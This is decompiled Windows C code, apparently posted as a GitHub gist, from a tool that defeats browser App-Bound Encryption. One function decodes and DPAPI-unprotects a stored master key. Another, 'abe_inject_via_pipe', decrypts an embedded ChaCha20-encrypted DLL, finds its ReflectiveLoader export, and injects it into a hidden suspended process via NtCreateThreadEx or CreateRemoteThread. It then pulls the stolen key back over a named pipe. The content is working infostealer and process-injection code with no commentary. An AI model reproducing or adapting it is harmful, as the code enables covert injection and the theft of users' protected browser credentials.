v7 = ((__int64 (__fastcall *)(void *, char *, __int64))sub_14000EEE0)(v41, pszString, 4096);
if ( !v7 && !(unsigned int)((__int64 (__fastcall *)(void *, char *, __int64))sub_14000EF60)(v6, pszString, 4096) )
{
log(X_1);
free(v6);
return 0;
}
X_2 = log(X_1);
free(v6);
X_3 = log(X_2);
strlen(pszString);
X_4 = log(X_3);
pcbBinary_.m128i_i32[0] = 4096;
if ( !CryptStringToBinaryA(pszString, 0, 1u, (BYTE *)&pbBinary_, (DWORD *)&pcbBinary_, nullptr, nullptr) )
{
n50_2 = strlen(pszString);
pcbBinary = &pcbBinary_;
pszString_1 = pszString;
n50_1 = n50_2;
n50 = 50;
if ( n50_1 <= 0x32 )
n50 = n50_1;
if ( (unsigned int)n50 >= 8 )
{
LODWORD(v28) = 0;
do
{
v29 = (unsigned int)v28;
v28 = (unsigned int)(v28 + 8);
*(__int64 *)((char *)pcbBinary_.m128i_i64 + v29) = *(_QWORD *)&pszString[v29];
}
while ( (unsigned int)v28 < ((unsigned int)n50 & 0xFFFFFFF8) );
pcbBinary = (__m128i *)((char *)&pcbBinary_ + v28);
pszString_1 = &pszString[v28];
}
n2 = 0;
if ( (n50 & 4) != 0 )
{
pcbBinary->m128i_i32[0] = *(_DWORD *)pszString_1;
n2 = 2;
}
if ( (n50 & 2) != 0 )
{
pcbBinary->m128i_i16[n2] = *(_WORD *)&pszString_1[n2 * 2];
++n2;
}
if ( (n50 & 1) != 0 )
pcbBinary->m128i_i8[n2 * 2] = pszString_1[n2 * 2];
pcbBinary_.m128i_i8[n50] = 0;
log(X_4);
return 0;
}
n5 = pcbBinary_.m128i_i32[0];
n63 = LOBYTE(v48[0]);
if ( pcbBinary_.m128i_i32[0] > 4u )
goto LABEL_27;
if ( pcbBinary_.m128i_i32[0] == 4 )
{
n63 = 63;
LABEL_27:
n63_1 = HIBYTE(pbBinary_);
LABEL_28:
n63_5 = BYTE2(pbBinary_);
goto LABEL_29;
}
if ( pcbBinary_.m128i_i32[0] == 3 )
{
n63_1 = 63;
n63 = 63;
goto LABEL_28;
}
if ( pcbBinary_.m128i_i32[0] != 2 )
{
n63_2 = 63;
n63_3 = 63;
if ( pcbBinary_.m128i_i32[0] )
n5 = 1;
n63_4 = 63;
X = log(X_4);
goto LABEL_12;
}
n63_5 = 63;
n63_1 = 63;
n63 = 63;
LABEL_29:
n63_3 = n63_1;
n63_4 = n63_5;
n63_2 = n63;
X = log(X_4);
if ( n5 > 4 )
{
if ( pbBinary_ == 1112559681 )
{
n8 = n5 - 4;
if ( n5 - 4 <= 0x1000 )
{
v33 = &v2[2].m128i_i8[8];
v2[2].m128i_i64[0] = 0x100000000LL;
if ( n8 >= 8 )
{
v2[2].m128i_i64[1] = v48[0];
*(_QWORD *)&v33[n8 - 8] = *(_QWORD *)&pszString[n8 + 4092];
qmemcpy(
(void *)((unsigned __int64)&v2[3] & 0xFFFFFFFFFFFFFFF8uLL),
(const void *)((char *)v48 - &v33[-((unsigned __int64)&v2[3] & 0xFFFFFFFFFFFFFFF8uLL)]),
8LL * ((n8 + (_DWORD)v33 - (((_DWORD)v2 + 48) & 0xFFFFFFF8)) >> 3));
}
else if ( (n8 & 4) != 0 )
{
v2[2].m128i_i32[2] = v48[0];
*(_DWORD *)&v33[n8 - 4] = *(int *)((char *)&pbBinary_ + n8);
}
else
{
v2[2].m128i_i8[8] = v48[0];
if ( (n8 & 2) != 0 )
*(_WORD *)&v33[n8 - 2] = *(_WORD *)((char *)&pbBinary_ + n8 + 2);
}
goto LABEL_85;
}
X = log(X);
}
else if ( n5 == 5 )
{
goto LABEL_12;
}
if ( pbBinary_ == 1346457668 && LOBYTE(v48[0]) == 73 )
{
X = log(X);
n512 = 512;
if ( (unsigned int)((__int64 (__fastcall *)(char *, _QWORD, __m128i *))sub_14000ECA0)(
(char *)v48 + 1,
n5 - 5,
&pcbBinary_) )
{
if ( n512 > 4 )
{
if ( pcbBinary_.m128i_i32[0] == 1112559681 )
{
n8 = n512 - 4;
if ( n512 - 4 <= 0x1000 )
{
v2[2].m128i_i64[0] = 0x100000000LL;
v14 = &v2[2].m128i_i8[8];
if ( n8 < 8 )
{
if ( (n8 & 4) != 0 )
{
v2[2].m128i_i32[2] = pcbBinary_.m128i_i32[1];
*(_DWORD *)&v14[n8 - 4] = *(__int32 *)((char *)pcbBinary_.m128i_i32 + n8);
}
else if ( n8 )
{
v2[2].m128i_i8[8] = pcbBinary_.m128i_i8[4];
if ( (n8 & 2) != 0 )
*(_WORD *)&v14[n8 - 2] = *(__int16 *)((char *)&pcbBinary_.m128i_i16[1] + n8);
}
goto LABEL_85;
}
goto LABEL_89;
}
}
else if ( n512 == 32 )
{
v34 = _mm_loadu_si128(&pcbBinary_);
v2[2].m128i_i64[0] = 1;
v35 = _mm_loadu_si128(v45);
*v2 = v34;
v2[1] = v35;
log(X);
return v4;
}
}
}
}
}
LABEL_12:
X = log(X);
n512 = 512;
if ( (unsigned int)((__int64 (__fastcall *)(int *, _QWORD, __m128i *, unsigned int *, int, int, int))sub_14000ECA0)(
&pbBinary_,
n5,
&pcbBinary_,
&n512,
n63_4,
n63_3,
n63_2)
&& n512 > 4 )
{
if ( pcbBinary_.m128i_i32[0] == 1112559681 )
{
n8 = n512 - 4;
if ( n512 - 4 <= 0x1000 )
{
v2[2].m128i_i64[0] = 0x100000000LL;
v14 = &v2[2].m128i_i8[8];
if ( n8 < 8 )
{
if ( (n8 & 4) != 0 )
{
v2[2].m128i_i32[2] = pcbBinary_.m128i_i32[1];
*(_DWORD *)&v14[n8 - 4] = *(__int32 *)((char *)pcbBinary_.m128i_i32 + n8);
}
else if ( n8 )
{
v2[2].m128i_i8[8] = pcbBinary_.m128i_i8[4];
if ( (n8 & 2) != 0 )
*(_WORD *)&v14[n8 - 2] = *(__int16 *)((char *)&pcbBinary_.m128i_i16[1] + n8);
}
goto LABEL_85;
}
LABEL_89:
v2[2].m128i_i64[1] = *(__int64 *)((char *)pcbBinary_.m128i_i64 + 4);
*(_QWORD *)&v14[n8 - 8] = *(BYTE **)((char *)&pDataOut_.pbData + n8 + 4);
qmemcpy(
(void *)((unsigned __int64)&v2[3] & 0xFFFFFFFFFFFFFFF8uLL),
(const void *)((char *)pcbBinary_.m128i_i64 + 4 - &v14[-((unsigned __int64)&v2[3] & 0xFFFFFFFFFFFFFFF8uLL)]),
8LL * ((n8 + (_DWORD)v14 - (((_DWORD)v2 + 48) & 0xFFFFFFF8)) >> 3));
LABEL_85:
v2[258].m128i_i32[2] = n8;
log(X);
return v4;
}
}
else if ( n512 == 32 )
{
v30 = _mm_loadu_si128(&pcbBinary_);
v2[2].m128i_i64[0] = 1;
v31 = _mm_loadu_si128(v45);
*v2 = v30;
v2[1] = v31;
log(X);
return v4;
}
}
if ( v7 )
goto LABEL_23;
X = log(X);
pDataIn_.cbData = n5;
pDataIn_.pbData = (BYTE *)&pbBinary_;
if ( !CryptUnprotectData(&pDataIn_, nullptr, nullptr, nullptr, nullptr, 5u, &pDataOut_)
&& !CryptUnprotectData(&pDataIn_, nullptr, nullptr, nullptr, nullptr, 1u, &pDataOut_) )
{
goto LABEL_23;
}
pbData = pDataOut_.pbData;
if ( pDataOut_.cbData <= 4 )
goto LABEL_56;
if ( *(_DWORD *)pDataOut_.pbData != 1112559681 )
{
if ( pDataOut_.cbData == 32 )
{
v2[2].m128i_i64[0] = 1;
v32 = _mm_loadu_si128((const __m128i *)pbData);
*v2 = v32;
v2[1] = _mm_loadu_si128((const __m128i *)pbData + 1);
LocalFree(pbData);
log(*(double *)v32.m128i_i64);
return v4;
}
goto LABEL_56;
}
n8_1 = pDataOut_.cbData - 4;
if ( pDataOut_.cbData - 4 > 0x1000 )
{
LABEL_56:
LocalFree(pDataOut_.pbData);
LABEL_23:
log(X);
return 0;
}
v20 = pDataOut_.pbData + 4;
v2[2].m128i_i64[0] = 0x100000000LL;
v21 = &v2[2].m128i_i8[8];
if ( n8_1 >= 8 )
{
v2[2].m128i_i64[1] = *(_QWORD *)(pbData + 4);
*(_QWORD *)&v21[n8_1 - 8] = *(_QWORD *)&v20[n8_1 - 8];
qmemcpy(
(void *)((unsigned __int64)&v2[3] & 0xFFFFFFFFFFFFFFF8uLL),
(const void *)(v20 - (BYTE *)&v21[-((unsigned __int64)&v2[3] & 0xFFFFFFFFFFFFFFF8uLL)]),
8LL * ((n8_1 + (_DWORD)v21 - (((_DWORD)v2 + 48) & 0xFFFFFFF8)) >> 3));
}
else if ( (n8_1 & 4) != 0 )
{
v2[2].m128i_i32[2] = *((_DWORD *)pbData + 1);
*(_DWORD *)&v21[n8_1 - 4] = *(_DWORD *)&pbData[n8_1];
}
else if ( n8_1 )
{
v2[2].m128i_i8[8] = pbData[4];
if ( (n8_1 & 2) != 0 )
*(_WORD *)&v21[n8_1 - 2] = *(_WORD *)&v20[n8_1 - 2];
}
v2[258].m128i_i32[2] = n8_1;
LocalFree(pbData);
log(X);
return v4;
}
__int64 __fastcall abe_inject_via_pipe(const WCHAR *a1, const void *lpBuffera, DWORD nNumberOfBytesToWrite, __int64 a4)
{
__int64 v5; // rbx
int v6; // r15d
unsigned int v7; // edi
DWORD TickCount; // esi
DWORD CurrentProcessId; // eax
char *lpAddress_2; // rax
char *lpAddress; // r15
__m128i v13; // xmm3
HANDLE *RemoteThread_1; // r11
__m128i v15; // xmm2
__m128i v16; // xmm1
unsigned int n312; // r14d
char *lpAddress_3; // rbx
char *v19; // rbp
unsigned int n312_1; // eax
int n10; // edi
__m128i v22; // xmm4
int v23; // r11d
int v24; // r11d
int v25; // r11d
int v26; // r11d
int v27; // r11d
int v28; // r11d
int v29; // r11d
unsigned int *v30; // rax
const __m128i *v31; // r10
__m128i *RemoteThread_2; // rdx
__m128i v33; // xmm0
__int64 i; // rax
char *v35; // rax
unsigned int v36; // ecx
unsigned __int16 v37; // dx
char *v38; // r9
char *v39; // rax
unsigned int v40; // edx
unsigned int v41; // ecx
char *v42; // rdi
char *v43; // rax
unsigned int v44; // ecx
unsigned int v45; // edx
__int64 v46; // r14
unsigned int v47; // ecx
char *v48; // rax
unsigned int v49; // edx
unsigned int v50; // ecx
char *v51; // rax
unsigned int v52; // edx
__int64 v53; // rcx
unsigned int v54; // eax
__int64 v55; // rdi
__int64 v56; // rsi
char *v57; // rbp
unsigned int v58; // ecx
char *v59; // rax
unsigned int v60; // edx
const char *Str1; // rcx
__int64 v62; // r8
unsigned int v63; // edx
char *v64; // rcx
unsigned int v65; // eax
HANDLE hProcess; // r13
HMODULE ModuleHandleW; // rax
const void *lpBuffera_1; // r10
wchar_t *RemoteThread_4; // r11
FARPROC IsWow64Process2; // rax
int v71; // eax
__int16 v72; // ax
size_t v73; // rax
int Stringd_1; // eax
int v75; // eax
char *lpAddress_1; // rcx
int v77; // r15d
wchar_t *RemoteThread_6; // r11
void *lpParameter; // r15
int v80; // eax
int v81; // eax
ULONG (__stdcall *lpStartAddress)(PVOID); // rbp
int v83; // eax
wchar_t *RemoteThread_7; // r11
LPCVOID lpBufferb_1; // r10
HANDLE RemoteThread_9; // rsi
BOOL (__stdcall *__imp_CloseHandle)(HANDLE); // rbp
DWORD v88; // r12d
BOOL v89; // eax
wchar_t *RemoteThread_10; // r11
BOOL v91; // eax
BOOL v92; // eax
HMODULE hModule; // rax
FARPROC NtCreateThreadEx; // rax
int v95; // eax
HANDLE RemoteThread_12; // rax
WINERROR LastError; // eax
_BYTE *lpBuffer; // rax
_BYTE *lpBuffer_1; // r12
BOOL v100; // eax
wchar_t *RemoteThread_11; // r11
__m128i v102; // xmm5
HANDLE hObject; // [rsp+60h] [rbp-348h]
wchar_t *RemoteThread_8; // [rsp+68h] [rbp-340h]
wchar_t *Stringc; // [rsp+68h] [rbp-340h]
wchar_t *Stringa; // [rsp+68h] [rbp-340h]
NTSTATUS Stringd; // [rsp+68h] [rbp-340h]
wchar_t *Stringb; // [rsp+68h] [rbp-340h]
wchar_t *Stringe; // [rsp+68h] [rbp-340h]
wchar_t *Stringf; // [rsp+68h] [rbp-340h]
char *v111; // [rsp+70h] [rbp-338h]
HANDLE hThread; // [rsp+70h] [rbp-338h]
__int64 v113; // [rsp+78h] [rbp-330h]
wchar_t *RemoteThread_5; // [rsp+78h] [rbp-330h]
DWORD nNumberOfBytesToRead; // [rsp+78h] [rbp-330h]
int n19968[2]; // [rsp+80h] [rbp-328h]
int n19968a; // [rsp+80h] [rbp-328h]
unsigned int v118; // [rsp+90h] [rbp-318h]
HANDLE *RemoteThread_3; // [rsp+98h] [rbp-310h]
int v120; // [rsp+ACh] [rbp-2FCh] BYREF
DWORD lpNumberOfBytesWritten_; // [rsp+B0h] [rbp-2F8h] BYREF
DWORD NumberOfBytesRead; // [rsp+B4h] [rbp-2F4h] BYREF
unsigned int v123[2]; // [rsp+B8h] [rbp-2F0h] BYREF
struct _PROCESS_INFORMATION ProcessInformation; // [rsp+C0h] [rbp-2E8h] BYREF
struct _OVERLAPPED Overlapped; // [rsp+E0h] [rbp-2C8h] BYREF
__m128i lpBuffer_2[3]; // [rsp+100h] [rbp-2A8h] BYREF
unsigned int v127[2]; // [rsp+130h] [rbp-278h] BYREF
_OWORD v128[3]; // [rsp+170h] [rbp-238h] BYREF
__m128i v129; // [rsp+1A0h] [rbp-208h] BYREF
HANDLE RemoteThread[6]; // [rsp+1B0h] [rbp-1F8h] BYREF
__m128i v131; // [rsp+1E0h] [rbp-1C8h]
struct _STARTUPINFOW lpStartupInfo; // [rsp+1F0h] [rbp-1B8h] BYREF
wchar_t Buffer[164]; // [rsp+260h] [rbp-148h] BYREF
LPCVOID lpBufferb; // [rsp+3B8h] [rbp+10h]
LPCVOID lpBufferc; // [rsp+3B8h] [rbp+10h]
LPCVOID lpBufferd; // [rsp+3B8h] [rbp+10h]
DWORD nNumberOfBytesToWritea; // [rsp+3C0h] [rbp+18h] BYREF
__int64 v139; // [rsp+3C8h] [rbp+20h]
v5 = a4;
nNumberOfBytesToWritea = nNumberOfBytesToWrite;
memset(&lpStartupInfo, 0, sizeof(lpStartupInfo));
memset(&ProcessInformation, 0, sizeof(ProcessInformation));
*(_QWORD *)v123 = 0;
memset(&Overlapped, 0, sizeof(Overlapped));
memset(lpBuffer_2, 0, 44);
if ( !a1 )
{
if ( !a4 )
return 0;
goto LABEL_11;
}
if ( !a4 )
return 0;
if ( !nNumberOfBytesToWrite || !lpBuffera )
{
LABEL_11:
*(_DWORD *)(a4 + 36) = 87;
return 0;
}
*(_QWORD *)(a4 + 32) = 0;
*(_OWORD *)a4 = 0;
v6 = dword_1400A0E20;
*(_OWORD *)(a4 + 16) = 0;
if ( !v6 )
{
*(_DWORD *)(a4 + 36) = 21;
return 0;
}
if ( !a1[264] )
{
*(_DWORD *)(a4 + 36) = 2;
return 0;
}
log("[#] ABE: Starting injection for %s\n", *(const char **)(*(_QWORD *)a1 + 8LL));
TickCount = GetTickCount();
CurrentProcessId = GetCurrentProcessId();
_snwprintf(Buffer, 0x80u, L"\\\\.\\pipe\\abe_%lu_%lu", CurrentProcessId, TickCount);
hObject = CreateNamedPipeW(Buffer, 3u, 0, 1u, 0x1000u, 0x1000u, 0x7530u, nullptr);
if ( hObject == (HANDLE)-1LL )
{
LABEL_33:
*(_DWORD *)(v5 + 36) = GetLastError();
return 0;
}
lpAddress_2 = (char *)VirtualAlloc(nullptr, 0x4E00u, 0x3000u, 4u);
lpAddress = lpAddress_2;
if ( !lpAddress_2 )
{
CloseHandle(hObject);
*(_DWORD *)(v5 + 36) = 8;
return 0;
}
v13 = _mm_loadu_si128((const __m128i *)&xmmword_14007FCA0);
RemoteThread_1 = RemoteThread;
v15 = _mm_loadu_si128((const __m128i *)&xmmword_14007FCB0);
v16 = _mm_loadu_si128((const __m128i *)&xmmword_14007FCC0);
v139 = v5;
n312 = 0;
lpAddress_3 = lpAddress_2;
v19 = (char *)&unk_14007AEA0;
do
{
n312_1 = n312;
v128[0] = v13;
++n312;
v129.m128i_i64[0] = n312_1 | 0xB1E0DD1E00000000uLL;
n10 = 10;
v129.m128i_i64[1] = 0xAAADF44647E76DF4uLL;
qmemcpy(RemoteThread, "expand 32-byte k", 16);
RemoteThread[2] = (HANDLE)0x3EBCDEE352F41C1FLL;
RemoteThread[3] = (HANDLE)0xA3F0E818CD8A03DBLL;
v22 = _mm_loadu_si128(&v129);
RemoteThread[4] = (HANDLE)0xEE9A8068A0C83059LL;
RemoteThread[5] = (HANDLE)0xC87ACB7D1AE48445LL;
v128[1] = v15;
v128[2] = v16;
v131 = v22;
do
{
sub_140015840((_DWORD)RemoteThread_1, 0, 4, 8, 12);
sub_140015840(v23, 1, 5, 9, 13);
sub_140015840(v24, 2, 6, 10, 14);
sub_140015840(v25, 3, 7, 11, 15);
sub_140015840(v26, 0, 5, 10, 15);
sub_140015840(v27, 1, 6, 11, 12);
sub_140015840(v28, 2, 7, 8, 13);
sub_140015840(v29, 3, 4, 9, 14);
--n10;
}
while ( n10 );
v30 = v127;
v31 = (const __m128i *)v128;
RemoteThread_2 = (__m128i *)RemoteThread_1;
do
{
v33 = _mm_add_epi32(_mm_loadu_si128(v31), *RemoteThread_2);
v30 += 4;
++v31;
++RemoteThread_2;
*((__m128i *)v30 - 1) = v33;
}
while ( v30 != (unsigned int *)v128 );
for ( i = 0; i != 16; i += 4 )
*(__m128i *)&lpAddress_3[i * 4] = _mm_xor_si128(
_mm_loadu_si128((const __m128i *)&v127[i]),
*(__m128i *)&v19[i * 4]);
v19 += 64;
lpAddress_3 += 64;
}
while ( n312 != 312 );
v5 = v139;
if ( *(_WORD *)lpAddress != 23117 )
goto LABEL_30;
v35 = &lpAddress[*((int *)lpAddress + 15)];
if ( *(_DWORD *)v35 != 17744 )
goto LABEL_30;
v36 = *((_DWORD *)v35 + 34);
if ( !v36 )
goto LABEL_30;
v37 = *((_WORD *)v35 + 3);
if ( !v37 )
goto LABEL_30;
v111 = &v35[*((unsigned __int16 *)v35 + 10) + 24];
v38 = &v111[40 * v37];
v39 = v111;
while ( 1 )
{
v40 = *((_DWORD *)v39 + 3);
if ( v36 >= v40 && v36 < v40 + *((_DWORD *)v39 + 2) )
break;
v39 += 40;
if ( v39 == v38 )
goto LABEL_30;
}
v41 = *((_DWORD *)v39 + 5) + v36 - v40;
if ( !v41 )
goto LABEL_30;
v42 = &lpAddress[v41];
v43 = v111;
v44 = *((_DWORD *)v42 + 8);
while ( 1 )
{
v45 = *((_DWORD *)v43 + 3);
if ( v44 >= v45 && v44 < v45 + *((_DWORD *)v43 + 2) )
break;
v43 += 40;
if ( v43 == v38 )
{
v46 = 0;
goto LABEL_41;
}
}
v46 = *((_DWORD *)v43 + 5) + v44 - v45;
LABEL_41:
v47 = *((_DWORD *)v42 + 9);
v48 = v111;
while ( 1 )
{
v49 = *((_DWORD *)v48 + 3);
if ( v47 >= v49 && v47 < v49 + *((_DWORD *)v48 + 2) )
break;
v48 += 40;
if ( v48 == v38 )
{
v113 = 0;
goto LABEL_46;
}
}
v113 = *((_DWORD *)v48 + 5) + v47 - v49;
LABEL_46:
v50 = *((_DWORD *)v42 + 7);
v51 = v111;
while ( 1 )
{
v52 = *((_DWORD *)v51 + 3);
if ( v50 >= v52 && v50 < v52 + *((_DWORD *)v51 + 2) )
break;
v51 += 40;
if ( v38 == v51 )
{
v53 = 0;
goto LABEL_51;
}
}
v53 = *((_DWORD *)v51 + 5) + v50 - v52;
LABEL_51:
v54 = *((_DWORD *)v42 + 6);
if ( !v54 )
goto LABEL_30;
*(_QWORD *)n19968 = v53;
v55 = 0;
RemoteThread_3 = RemoteThread_1;
v56 = v54;
v57 = v38;
while ( 1 )
{
v58 = *(_DWORD *)&lpAddress[4 * v55 + v46];
v59 = v111;
while ( 1 )
{
v60 = *((_DWORD *)v59 + 3);
if ( v58 >= v60 && v58 < v60 + *((_DWORD *)v59 + 2) )
break;
v59 += 40;
if ( v57 == v59 )
{
Str1 = lpAddress;
goto LABEL_58;
}
}
Str1 = &lpAddress[*((_DWORD *)v59 + 5) + v58 - v60];
LABEL_58:
if ( !strcmp(Str1, "ReflectiveLoader") )
break;
if ( v56 == ++v55 )
{
v5 = v139;
goto LABEL_30;
}
}
v62 = v55;
v7 = 0;
v5 = v139;
v63 = *(_DWORD *)&lpAddress[4 * *(unsigned __int16 *)&lpAddress[2 * v62 + v113] + *(_QWORD *)n19968];
v64 = v111;
while ( 1 )
{
v65 = *((_DWORD *)v64 + 3);
if ( v63 >= v65 && v63 < v65 + *((_DWORD *)v64 + 2) )
break;
v64 += 40;
if ( v64 == v57 )
goto LABEL_30;
}
v118 = *((_DWORD *)v64 + 5) + v63 - v65;
if ( !v118 )
{
LABEL_30:
VirtualFree(lpAddress, 0, 0x8000u);
CloseHandle(hObject);
*(_DWORD *)(v5 + 36) = 127;
return 0;
}
lpStartupInfo.cb = 104;
lpStartupInfo.dwFlags = STARTF_USESHOWWINDOW;
lpStartupInfo.wShowWindow = 0;
if ( !CreateProcessW(
a1 + 264,
nullptr,
nullptr,
nullptr,
0,
0x8000004u,
nullptr,
nullptr,
&lpStartupInfo,
&ProcessInformation) )
{
VirtualFree(lpAddress, 0, 0x8000u);
CloseHandle(hObject);
goto LABEL_33;
}
hProcess = ProcessInformation.hProcess;
hThread = ProcessInformation.hThread;
log("[#] ABE: Created suspended process (PID: %lu)\n", ProcessInformation.dwProcessId);
LOWORD(v128[0]) = 0;
LOWORD(RemoteThread[0]) = 0;
ModuleHandleW = GetModuleHandleW(L"kernel32.dll");
lpBuffera_1 = lpBuffera;
RemoteThread_4 = (wchar_t *)RemoteThread_3;
if ( ModuleHandleW )
{
IsWow64Process2 = GetProcAddress(ModuleHandleW, "IsWow64Process2");
lpBuffera_1 = lpBuffera;
RemoteThread_4 = (wchar_t *)RemoteThread_3;
if ( IsWow64Process2 )
{
v71 = ((__int64 (__fastcall *)(HANDLE, _OWORD *, HANDLE *))IsWow64Process2)(hProcess, v128, RemoteThread_3);
RemoteThread_4 = (wchar_t *)RemoteThread_3;
lpBuffera_1 = lpBuffera;
if ( v71 )
{
v72 = v128[0];
if ( !LOWORD(v128[0]) )
v72 = (__int16)RemoteThread[0];
if ( v72 != -31132 )
{
TerminateProcess(hProcess, 0);
CloseHandle(hThread);
CloseHandle(hProcess);
VirtualFree(lpAddress, 0, 0x8000u);
CloseHandle(hObject);
*(_DWORD *)(v5 + 36) = 50;
return 0;
}
}
}
}
lpBufferb = lpBuffera_1;
RemoteThread_5 = RemoteThread_4;
v73 = wcslen(Buffer);
n19968a = 2 * v73 + 2;
*(_QWORD *)v127 = 2 * v73 + 19970;
Stringd_1 = sub_1400176A0(hProcess, (unsigned int)v123, 0, (unsigned int)v127, 12288, 4);
if ( Stringd_1 < 0 )
{
Stringd = Stringd_1;
TerminateProcess(hProcess, 0);
CloseHandle(hThread);
CloseHandle(hProcess);
VirtualFree(lpAddress, 0, 0x8000u);
CloseHandle(hObject);
*(_DWORD *)(v5 + 36) = RtlNtStatusToDosError(Stringd);
return 0;
}
*(_QWORD *)&v128[0] = 0;
v75 = sub_1400176E0(hProcess, v123[0], lpAddress, 19968, (__int64)v128);
lpAddress_1 = lpAddress;
v77 = v75;
VirtualFree(lpAddress_1, 0, 0x8000u);
RemoteThread_6 = RemoteThread_5;
if ( v77 < 0
|| (lpParameter = (void *)(*(_QWORD *)v123 + 19968LL),
v80 = sub_1400176E0(hProcess, v123[0] + 19968, (char *)Buffer, n19968a, (__int64)v128),
RemoteThread_6 = RemoteThread_5,
v80 < 0)
|| (v120 = 0,
v81 = sub_1400177C0(hProcess, (unsigned int)v123, (unsigned int)v127, 32, (__int64)&v120),
RemoteThread_6 = RemoteThread_5,
v81 < 0) )
{
__imp_CloseHandle = (void (__stdcall *)(HANDLE))CloseHandle;
}
else
{
lpStartAddress = (ULONG (__stdcall *)(PVOID))(*(_QWORD *)v123 + v118);
RemoteThread[0] = nullptr;
v83 = sub_140017740(RemoteThread_5, 0x1FFFFF, 0, hProcess, lpStartAddress, lpParameter, 0, 0, 0, 0, 0);
RemoteThread_7 = RemoteThread_5;
lpBufferb_1 = lpBufferb;
if ( v83 >= 0 )
{
RemoteThread_9 = RemoteThread[0];
if ( RemoteThread[0] )
goto LABEL_82;
}
hModule = GetModuleHandleW("n");
lpBufferb_1 = lpBufferb;
RemoteThread_7 = RemoteThread_5;
if ( hModule )
{
NtCreateThreadEx = GetProcAddress(hModule, "NtCreateThreadEx");
lpBufferb_1 = lpBufferb;
RemoteThread_7 = RemoteThread_5;
if ( NtCreateThreadEx )
{
RemoteThread[0] = nullptr;
v95 = ((__int64 (__fastcall *)(wchar_t *, __int64, _QWORD, HANDLE, ULONG (__stdcall *)(PVOID), void *, _DWORD, _QWORD, _QWORD, _QWORD, _QWORD))NtCreateThreadEx)(
RemoteThread_5,
0x1FFFFF,
0,
hProcess,
lpStartAddress,
lpParameter,
0,
0,
0,
0,
0);
RemoteThread_7 = RemoteThread_5;
lpBufferb_1 = lpBufferb;
if ( v95 >= 0 )
{
RemoteThread_9 = RemoteThread[0];
if ( RemoteThread[0] )
goto LABEL_82;
}
}
}
Stringb = RemoteThread_7;
lpBufferd = lpBufferb_1;
RemoteThread_12 = CreateRemoteThread(hProcess, nullptr, 0, lpStartAddress, lpParameter, 0, nullptr);
lpBufferb_1 = lpBufferd;
RemoteThread_7 = Stringb;
RemoteThread_9 = RemoteThread_12;
if ( RemoteThread_12 )
{
LABEL_82:
RemoteThread_8 = RemoteThread_7;
lpBufferc = lpBufferb_1;
Overlapped.hEvent = CreateEventW(nullptr, 1, 0, nullptr);
ConnectNamedPipe(hObject, &Overlapped);
__imp_CloseHandle = (void (__stdcall *)(HANDLE))CloseHandle;
v88 = WaitForSingleObject(Overlapped.hEvent, 0x7530u);
CloseHandle(Overlapped.hEvent);
if ( v88 )
{
*(_DWORD *)(v5 + 36) = 1460;
sub_140017810(RemoteThread_9);
RemoteThread_6 = RemoteThread_8;
}
else
{
v89 = WriteFile(hObject, &nNumberOfBytesToWritea, 4u, &lpNumberOfBytesWritten_, nullptr);
RemoteThread_10 = RemoteThread_8;
if ( v89
&& (v91 = WriteFile(hObject, lpBufferc, nNumberOfBytesToWritea, &lpNumberOfBytesWritten_, nullptr),
RemoteThread_10 = RemoteThread_8,
v91)
&& (FlushFileBuffers(hObject),
v92 = ReadFile(hObject, lpBuffer_2, 0x2Cu, &NumberOfBytesRead, nullptr),
RemoteThread_10 = RemoteThread_8,
v92)
&& NumberOfBytesRead == 44 )
{
if ( (unsigned int)(lpBuffer_2[2].m128i_i32[2] - 1) <= 0x7FE )
{
nNumberOfBytesToRead = lpBuffer_2[2].m128i_u32[2];
lpBuffer = malloc((unsigned int)(lpBuffer_2[2].m128i_i32[2] + 1));
RemoteThread_10 = RemoteThread_8;
lpBuffer_1 = lpBuffer;
if ( lpBuffer )
{
v100 = ReadFile(hObject, lpBuffer, nNumberOfBytesToRead, &NumberOfBytesRead, nullptr);
RemoteThread_11 = RemoteThread_8;
if ( v100 && lpBuffer_2[2].m128i_i32[2] == NumberOfBytesRead )
{
lpBuffer_1[lpBuffer_2[2].m128i_u32[2]] = 0;
sub_14001F580(lpBuffer_1);
RemoteThread_11 = RemoteThread_8;
}
Stringf = RemoteThread_11;
free(lpBuffer_1);
RemoteThread_10 = Stringf;
}
}
if ( lpBuffer_2[0].m128i_i64[0] == 0x2000000000LL )
{
v102 = _mm_loadu_si128((const __m128i *)&lpBuffer_2[0].m128i_u64[1]);
*(_DWORD *)(v5 + 32) = 1;
v7 = 1;
*(__m128i *)v5 = v102;
*(__m128i *)(v5 + 16) = _mm_loadu_si128((const __m128i *)&lpBuffer_2[1].m128i_u64[1]);
}
else
{
*(_DWORD *)(v5 + 36) = lpBuffer_2[0].m128i_i32[0];
}
Stringc = RemoteThread_10;
sub_140017810(RemoteThread_9);
RemoteThread_6 = Stringc;
}
else
{
Stringe = RemoteThread_10;
*(_DWORD *)(v5 + 36) = GetLastError();
sub_140017810(RemoteThread_9);
RemoteThread_6 = Stringe;
}
}
}
else
{
LastError = GetLastError();
__imp_CloseHandle = (void (__stdcall *)(HANDLE))CloseHandle;
RemoteThread_6 = Stringb;
*(_DWORD *)(v5 + 36) = LastError;
}
}
Stringa = RemoteThread_6;
__imp_CloseHandle(hObject);
if ( hProcess )
{
RemoteThread[0] = (HANDLE)-10000000LL;
sub_1400177F0(hProcess, 0);
sub_140017840(hProcess, 0, Stringa);
__imp_CloseHandle(hProcess);
}
if ( hThread )
__imp_CloseHandle(hThread);
return v7;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment